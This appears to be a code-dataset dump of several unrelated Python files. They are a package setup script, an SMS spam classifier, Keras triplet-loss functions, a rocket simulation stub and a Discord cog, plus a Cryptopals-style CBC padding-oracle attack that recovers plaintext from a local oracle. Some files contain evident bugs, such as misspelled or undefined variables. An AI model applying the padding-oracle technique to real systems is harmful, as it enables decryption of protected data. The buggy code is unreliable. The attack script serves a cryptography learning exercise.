here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as requirements_file:
requirements = [line for line in requirements_file.read().splitlines()
if not line.startswith('#')]
extensions = []
def get_pybind11_headers():
import pybind11
major, minor, _ = pybind11.version_info
if major < 2 or minor < 3:
raise Exception(
"autocorr requires pybind11 "
"{0}.{1} or higher".format(*min_pybind11_version))
return pybind11.get_include()
c_mulittau = Extension(
'autocorr.cAutocorr',
sources=['src/pyMultiTau.cpp', 'src/cpu_multitau.cpp', 'src/fftautocorr.cpp'],
include_dirs=[get_pybind11_headers()],
extra_compile_args=['-std=c++11', '-fopenmp'],
libraries=['fftw3_omp', 'm', 'gomp']
)
extensions.append(c_mulittau)
setup(
name='autocorr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Library for XPCS and image autocorrelation in general",
long_description=readme,
author="BES Data Solutions Pilot",
author_email='dallan@bnl.gov',
url='https://github.com/scikit-beam/autocorr',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
],
},
include_package_data=True,
package_data={
'autocorr': [
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
ext_modules=extensions
)
| true | true |
1c331147ea30befa010f9a880e04c012fd77ed69 | 2,469 | py | Python | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | null | null | null | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | null | null | null | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | 3 | 2018-05-31T07:04:06.000Z | 2018-10-30T17:42:07.000Z |
import os, csv, re, nltk
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
from sklearn.metrics import confusion_matrix
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
from nltk.stem.wordnet import WordNetLemmatizer
import snowballstemmer
class spam():
def __init__(self):
pass
def data_input(self, loc, filename):
try:
os.chdir(loc)
f = open(filename, 'r')
file = csv.reader(f, delimiter = ',')
df = pd.DataFrame(np.array(list(file)))
df.columns = df.iloc[0]
df = df[1:]
le = preprocessing.LabelEncoder()
le.fit(df['v1'])
df['v1'] = le.transform(df['v1'])
print (df.shape)
self.df = df
except IOError:
print ('PROBLEM READING: ' + filename)
def data_cleaning(self):
stop = set(stopwords.words('english'))
lmtzr = WordNetLemmatizer()
stemmer = snowballstemmer.stemmer('english')
c = np.array(self.df.v2)
self.corpus = []
for i in range(len(self.df.v2)):
review = re.sub('[^a-zA-Z]', ' ', c[i])
review = [i for i in review.lower().split() if i not in stop]
l = [lmtzr.lemmatize(x) for x in review]
s = stemmer.stemWords(l)
review = ' '.join(s)
self.corpus.append(review)
print (self.corpus)
def vectorizer(self):
cv = CountVectorizer()
self.X = cv.fit_transform(self.coupus).toarray()
self.y = self.df['v1']
def data_split(self):
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size = 0.20)
def classifier(self):
classifier = BernoulliNB()
classifier.fit(self.X_train, self.y_train)
if __name__ == '__main__':
loc = os.getcwd() + '\data'
filename = 'spam.csv'
s = spam()
s.data_input(loc, filename)
s.data_cleaning()
s.vectorizer()
s.data_split()
s.classifier()
| 20.404959 | 114 | 0.611989 |
import os, csv, re, nltk
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
from sklearn.metrics import confusion_matrix
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
from nltk.stem.wordnet import WordNetLemmatizer
import snowballstemmer
class spam():
def __init__(self):
pass
def data_input(self, loc, filename):
try:
os.chdir(loc)
f = open(filename, 'r')
file = csv.reader(f, delimiter = ',')
df = pd.DataFrame(np.array(list(file)))
df.columns = df.iloc[0]
df = df[1:]
le = preprocessing.LabelEncoder()
le.fit(df['v1'])
df['v1'] = le.transform(df['v1'])
print (df.shape)
self.df = df
except IOError:
print ('PROBLEM READING: ' + filename)
def data_cleaning(self):
stop = set(stopwords.words('english'))
lmtzr = WordNetLemmatizer()
stemmer = snowballstemmer.stemmer('english')
c = np.array(self.df.v2)
self.corpus = []
for i in range(len(self.df.v2)):
review = re.sub('[^a-zA-Z]', ' ', c[i])
review = [i for i in review.lower().split() if i not in stop]
l = [lmtzr.lemmatize(x) for x in review]
s = stemmer.stemWords(l)
review = ' '.join(s)
self.corpus.append(review)
print (self.corpus)
def vectorizer(self):
cv = CountVectorizer()
self.X = cv.fit_transform(self.coupus).toarray()
self.y = self.df['v1']
def data_split(self):
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size = 0.20)
def classifier(self):
classifier = BernoulliNB()
classifier.fit(self.X_train, self.y_train)
if __name__ == '__main__':
loc = os.getcwd() + '\data'
filename = 'spam.csv'
s = spam()
s.data_input(loc, filename)
s.data_cleaning()
s.vectorizer()
s.data_split()
s.classifier()
| true | true |
1c3312ed599f7e848d662a175adb396479227a15 | 4,281 | py | Python | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | import base64
import random
import time
from PKCS7 import valid_pad
from PKCS7 import PKCS7_pad as pad
from AES_CBC import Ciphers
from AES_CBC import InvCiphers
from AES_CBC import KeyExpansion
#const
randKey = bytes([random.getrandbits(8) for i in range(16)])
w = KeyExpansion( randKey )
IV = ''.join([chr(random.getrandbits(8)) for i in range(16)])
#The attacker have control of the ciphertext, IV and the padding_oracle
def str2bytes( string ):
return bytes([ord(ltr) for ltr in string])
def random_CBC_cipher():
f = open('17.txt', 'r')
num = random.randint(1,10)
count = 0
for line in f:
count += 1
if count == num:
break
line = line.replace('\n','').encode('ascii')
line = base64.b64decode( line )
print(line)
i = 0
track_num = ''
while len(track_num) != len(line):
track_num += hex(i).replace('0x','')
i = (i+1) % 16
print(' ' + track_num)
print('==== This part is just for debugging, real program down here ↓↓↓ ====\n')
cipher = str2bytes(Ciphers( pad(line, 16), w, IV ))
return cipher
def padding_oracle( cipher ):
return valid_pad( str2bytes(InvCiphers( cipher, w, IV )), 16 )
#>> In one of my first trials at this challenge,
#>> my valid_pad return 'True' for '\x00' padding also LOL
def XOR( block1, block2 ):
return bytes([x^y for x,y in zip(block1, block2)])
def padOf( num ):
return bytes([num for i in range(num)])
def main():
cipher = random_CBC_cipher()
print('cipher:', cipher)
print('IV:', str2bytes(IV), end = '\n\n')
print('This is all you have (and a padding_oracle, of course!). Now cracking the cipher...')
## Inner mechanism >>
plain = b''
C2 = str2bytes(IV)
print('cipher\'s length: ' + str(len(cipher)))
for t in range(0, len(cipher), 16):
print('\n\n**** BLOCK NO.' + str(t//16) + ' ****')
C1 = C2
C2 = cipher[t:t+16]
original_C1 = C1
DC2 = b'' #decrypted ciphertext
#so I have to take care of the first two rounds because this attack relies on the
#hope that first round will make P1+P2 has a valid padding ('\x01')
#but it could also be ('\x02\x02', '\x03\x03\x03', &c)
#so only the second round need Loop_detection_agent
# NOTE: THE LINE 'decoded P1 + P2: '... IS USED JUST FOR DEBUGGING PURPOSE
#first round
print('FIRST ROUND >>')
wanted_C1 = []
for i in range(256):
if padding_oracle( C1 + C2 ):
wanted_C1 += [C1]
DC2 = bytes([C1[15] ^ 1]) + DC2
print( XOR(original_C1[15:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
C1 = C1[:15] + bytes([(C1[15] + 1) % 256])
#second round
for C1 in wanted_C1:
DC2 = bytes([C1[15] ^ 1]) + DC2
print('\nSECOND ROUND >>')
looped = False
C1 = C1[:15] + XOR(DC2, b'\x02')
loop_count = 0
while not padding_oracle( C1 + C2 ):
C1 = C1[:14] + bytes([(C1[14]+1) % 256]) + C1[15:]
if C1[14] == 0:
loop_count += 1
if loop_count >= 2:
looped = True
break
DC2 = bytes([C1[14] ^ 2]) + DC2
print( XOR(original_C1[14:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
if looped == False:
break
#latter rounds
print('\nLATTER ROUNDS >>')
for i in range(13,-1,-1):
C1 = C1[:i+1] + XOR(DC2, padOf(16-i)[1:])
while not padding_oracle( C1 + C2 ):
C1 = C1[:i] + bytes([(C1[i]+1) % 256]) + C1[i+1:]
DC2 = bytes([C1[i] ^ (16-i)]) + DC2
print( XOR(original_C1[i:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
plain += XOR(original_C1, DC2)
print(plain)
if __name__ == '__main__':
main()
| 32.679389 | 97 | 0.512731 | import base64
import random
import time
from PKCS7 import valid_pad
from PKCS7 import PKCS7_pad as pad
from AES_CBC import Ciphers
from AES_CBC import InvCiphers
from AES_CBC import KeyExpansion
randKey = bytes([random.getrandbits(8) for i in range(16)])
w = KeyExpansion( randKey )
IV = ''.join([chr(random.getrandbits(8)) for i in range(16)])
def str2bytes( string ):
return bytes([ord(ltr) for ltr in string])
def random_CBC_cipher():
f = open('17.txt', 'r')
num = random.randint(1,10)
count = 0
for line in f:
count += 1
if count == num:
break
line = line.replace('\n','').encode('ascii')
line = base64.b64decode( line )
print(line)
i = 0
track_num = ''
while len(track_num) != len(line):
track_num += hex(i).replace('0x','')
i = (i+1) % 16
print(' ' + track_num)
print('==== This part is just for debugging, real program down here ↓↓↓ ====\n')
cipher = str2bytes(Ciphers( pad(line, 16), w, IV ))
return cipher
def padding_oracle( cipher ):
return valid_pad( str2bytes(InvCiphers( cipher, w, IV )), 16 )
def XOR( block1, block2 ):
return bytes([x^y for x,y in zip(block1, block2)])
def padOf( num ):
return bytes([num for i in range(num)])
def main():
cipher = random_CBC_cipher()
print('cipher:', cipher)
print('IV:', str2bytes(IV), end = '\n\n')
print('This is all you have (and a padding_oracle, of course!). Now cracking the cipher...')
C2 = str2bytes(IV)
print('cipher\'s length: ' + str(len(cipher)))
for t in range(0, len(cipher), 16):
print('\n\n**** BLOCK NO.' + str(t//16) + ' ****')
C1 = C2
C2 = cipher[t:t+16]
original_C1 = C1
DC2 = b'' #decrypted ciphertext
#so I have to take care of the first two rounds because this attack relies on the
#hope that first round will make P1+P2 has a valid padding ('\x01')
#but it could also be ('\x02\x02', '\x03\x03\x03', &c)
#so only the second round need Loop_detection_agent
# NOTE: THE LINE 'decoded P1 + P2: '... IS USED JUST FOR DEBUGGING PURPOSE
#first round
print('FIRST ROUND >>')
wanted_C1 = []
for i in range(256):
if padding_oracle( C1 + C2 ):
wanted_C1 += [C1]
DC2 = bytes([C1[15] ^ 1]) + DC2
print( XOR(original_C1[15:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
C1 = C1[:15] + bytes([(C1[15] + 1) % 256])
#second round
for C1 in wanted_C1:
DC2 = bytes([C1[15] ^ 1]) + DC2
print('\nSECOND ROUND >>')
looped = False
C1 = C1[:15] + XOR(DC2, b'\x02')
loop_count = 0
while not padding_oracle( C1 + C2 ):
C1 = C1[:14] + bytes([(C1[14]+1) % 256]) + C1[15:]
if C1[14] == 0:
loop_count += 1
if loop_count >= 2:
looped = True
break
DC2 = bytes([C1[14] ^ 2]) + DC2
print( XOR(original_C1[14:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
if looped == False:
break
#latter rounds
print('\nLATTER ROUNDS >>')
for i in range(13,-1,-1):
C1 = C1[:i+1] + XOR(DC2, padOf(16-i)[1:])
while not padding_oracle( C1 + C2 ):
C1 = C1[:i] + bytes([(C1[i]+1) % 256]) + C1[i+1:]
DC2 = bytes([C1[i] ^ (16-i)]) + DC2
print( XOR(original_C1[i:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
plain += XOR(original_C1, DC2)
print(plain)
if __name__ == '__main__':
main()
| true | true |
1c3314374f8fb01f613de63c5fa967af3b8e0188 | 7,367 | py | Python | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 77 | 2019-03-07T12:18:47.000Z | 2022-03-28T08:21:55.000Z | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 23 | 2019-05-17T11:23:02.000Z | 2022-03-11T23:42:29.000Z | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 29 | 2019-03-11T02:41:42.000Z | 2022-02-07T15:37:24.000Z | from tensorflow.keras import backend as K
import tensorflow as tf
_EPSILON = K.epsilon()
def hinge_loss_fn(batch_size):
def hinge_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_loss
def hinge_new_loss_fn(batch_size):
def hinge_new_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
D_p_n = K.sqrt(K.sum((p_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n + D_q_p - D_p_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_new_loss
def hinge_twice_loss_fn(batch_size):
def hinge_twice_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_twice_loss
def contrastive_loss_fn(batch_size):
def contrastive_loss(y_true, y_pred):
def _contrastive_loss(y1, D):
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
return K.mean(y1 * K.square(D) +
(g - y1) * K.square(K.maximum(g - D, 0)))
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
h = tf.constant(0.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
L_q_p = _contrastive_loss(g, D_q_p)
L_q_n = _contrastive_loss(h, D_q_n)
loss = (loss + L_q_p + L_q_n )
except:
continue
loss = loss/(batch_size*2/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return contrastive_loss
#https://towardsdatascience.com/lossless-triplet-loss-7e932f990b24
def lossless_loss_fn(batch_size):
def lossless_loss(y_true, y_pred):
N = tf.constant(4096.0, shape=[1], dtype=tf.float32)
beta = tf.constant(4096.0, shape=[1], dtype=tf.float32)
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
const1 = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
anchor = y_pred[i+0]
positive = y_pred[i+1]
negative = y_pred[i+2]
pos_dist = K.sum(K.square(anchor-positive),1)
neg_dist = K.sum(K.square(anchor,negative),1)
pos_dist = -tf.log(-tf.divide((pos_dist), beta)+const1+epsilon)
neg_dist = -tf.log(-tf.divide((N-neg_dist), beta)+const1+epsilon)
_loss = neg_dist + pos_dist
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return lossless_loss
def angular_loss_1_fn(batch_size):
def angular_loss_1(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
sq = K.square(xa-xp)
xc = (xa+xp)/2
_loss = sq - c*(tf.tan(alpha*K.square(xn-xc))**2)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
_loss = tf.maximum(_loss,zero)
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
return loss
return angular_loss_1
def angular_loss_2_fn(batch_size):
def angular_loss_2(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
d = tf.constant(2.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
losses = []
losses2 = []
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
fapn = c*(tf.tan(alpha*K.transpose(xa+xp)*xn)**2) - d*(g+tf.tan(alpha)**2)*K.transpose(xa)*xp
losses.append(fapn)
losses2.append(K.transpose(xa)*xn - K.transpose(xa)*xp)
loss = (loss + g + _loss)
except:
continue
loss = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses])))
loss2 = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses2])))
loss = loss + 2*loss2
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return angular_loss_2 | 38.570681 | 109 | 0.539297 | from tensorflow.keras import backend as K
import tensorflow as tf
_EPSILON = K.epsilon()
def hinge_loss_fn(batch_size):
def hinge_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_loss
def hinge_new_loss_fn(batch_size):
def hinge_new_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
D_p_n = K.sqrt(K.sum((p_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n + D_q_p - D_p_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_new_loss
def hinge_twice_loss_fn(batch_size):
def hinge_twice_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_twice_loss
def contrastive_loss_fn(batch_size):
def contrastive_loss(y_true, y_pred):
def _contrastive_loss(y1, D):
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
return K.mean(y1 * K.square(D) +
(g - y1) * K.square(K.maximum(g - D, 0)))
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
h = tf.constant(0.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
L_q_p = _contrastive_loss(g, D_q_p)
L_q_n = _contrastive_loss(h, D_q_n)
loss = (loss + L_q_p + L_q_n )
except:
continue
loss = loss/(batch_size*2/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return contrastive_loss
def lossless_loss_fn(batch_size):
def lossless_loss(y_true, y_pred):
N = tf.constant(4096.0, shape=[1], dtype=tf.float32)
beta = tf.constant(4096.0, shape=[1], dtype=tf.float32)
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
const1 = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
anchor = y_pred[i+0]
positive = y_pred[i+1]
negative = y_pred[i+2]
pos_dist = K.sum(K.square(anchor-positive),1)
neg_dist = K.sum(K.square(anchor,negative),1)
pos_dist = -tf.log(-tf.divide((pos_dist), beta)+const1+epsilon)
neg_dist = -tf.log(-tf.divide((N-neg_dist), beta)+const1+epsilon)
_loss = neg_dist + pos_dist
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return lossless_loss
def angular_loss_1_fn(batch_size):
def angular_loss_1(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
sq = K.square(xa-xp)
xc = (xa+xp)/2
_loss = sq - c*(tf.tan(alpha*K.square(xn-xc))**2)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
_loss = tf.maximum(_loss,zero)
loss = (loss + g + _loss)
except:
continue
loss = loss/(batch_size/3)
return loss
return angular_loss_1
def angular_loss_2_fn(batch_size):
def angular_loss_2(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
c = tf.constant(4.0, shape=[1], dtype=tf.float32)
d = tf.constant(2.0, shape=[1], dtype=tf.float32)
alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
losses = []
losses2 = []
for i in range(0,batch_size,3):
try:
xa = y_pred[i+0]
xp = y_pred[i+1]
xn = y_pred[i+2]
fapn = c*(tf.tan(alpha*K.transpose(xa+xp)*xn)**2) - d*(g+tf.tan(alpha)**2)*K.transpose(xa)*xp
losses.append(fapn)
losses2.append(K.transpose(xa)*xn - K.transpose(xa)*xp)
loss = (loss + g + _loss)
except:
continue
loss = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses])))
loss2 = K.sum(K.log(1+2*K.sum([K.exp(v) for v in losses2])))
loss = loss + 2*loss2
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return angular_loss_2 | true | true |
1c3314cfa907a66f629e785eaa51462cbe241442 | 1,072 | py | Python | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | src/base.py | DrFargo/Starship-Simulation | ff1c30cd8227c7041357a1e2da2fcb34ab06a757 | [
"MIT"
] | null | null | null | ## Author DrFargo
## Created: 2021-02-07
## Latest update: 2021-02-12
import matplotlib
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
class starshipSimulation:
def parameters(self, g, lox, engines):
gravity = g
tlox = lox
rapteng = engines*2.3
m_fuel = 1.8
m_ox = 2.2
#def DragForce(self, v):
def Render(self, filename):
fig = plt.figure()
ax = fig.gca(projection='3d')
ax = self.XYZLabels(ax, 12000)
plt.savefig(filename + ".png")
plt.show()
def explode(self,t):
ax.text(0, 0, 0, "red", color='red')
return y[1]
def XYZLabels(self, ax, Limit):
TopAlt = np.max(Limit)
Lim = TopAlt*1.1
ax.set_zlim3d([0,2*Lim])
ax.set_xlim3d([-Lim,Lim])
ax.set_ylim3d([-Lim,Lim])
ax.set_xlabel("Eastings")
ax.set_ylabel("Northings")
ax.set_zlabel("Altitude") | 26.146341 | 45 | 0.545709 | port numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
class starshipSimulation:
def parameters(self, g, lox, engines):
gravity = g
tlox = lox
rapteng = engines*2.3
m_fuel = 1.8
m_ox = 2.2
def Render(self, filename):
fig = plt.figure()
ax = fig.gca(projection='3d')
ax = self.XYZLabels(ax, 12000)
plt.savefig(filename + ".png")
plt.show()
def explode(self,t):
ax.text(0, 0, 0, "red", color='red')
return y[1]
def XYZLabels(self, ax, Limit):
TopAlt = np.max(Limit)
Lim = TopAlt*1.1
ax.set_zlim3d([0,2*Lim])
ax.set_xlim3d([-Lim,Lim])
ax.set_ylim3d([-Lim,Lim])
ax.set_xlabel("Eastings")
ax.set_ylabel("Northings")
ax.set_zlabel("Altitude") | true | true |
1c331613d3b8ca181851d6b069742635a6769333 | 1,134 | py | Python | bot/cogs/Cogs/__init__.py | abindent/Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 2 | 2022-03-20T13:12:35.000Z | 2022-03-27T08:52:37.000Z | bot/cogs/Cogs/__init__.py | abindent/Nextcord-Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 2 | 2022-03-07T01:10:21.000Z | 2022-03-08T07:33:06.000Z | bot/cogs/Cogs/__init__.py | abindent/Utility-Bot | a11b790e7930a035fdca2b153950e624e3abafe4 | [
"MIT"
] | 1 | 2022-03-08T07:41:46.000Z | 2022-03-08T07:41:46.000Z | import nextcord
from nextcord.ext import commands
class CogSetup(commands.Cog, name="Extension Setup", description="Load, Unload or Reload the extensions."):
def __init__(self, bot):
self.bot = bot
COG_EMOJI = "⚙️"
# Load Command
@commands.command(name="load", description="Load the cogs.", usage="<cog_name or extension_name>")
@commands.is_owner()
async def load(self, ctx, extensions):
self.bot.load_extension(f"cogs.{extensions}")
await ctx.send("Loaded Cogs")
# Unload Comamnd
@commands.command(name="unload", description="Unload the cogs.", usage="<cog_name or extension_name>")
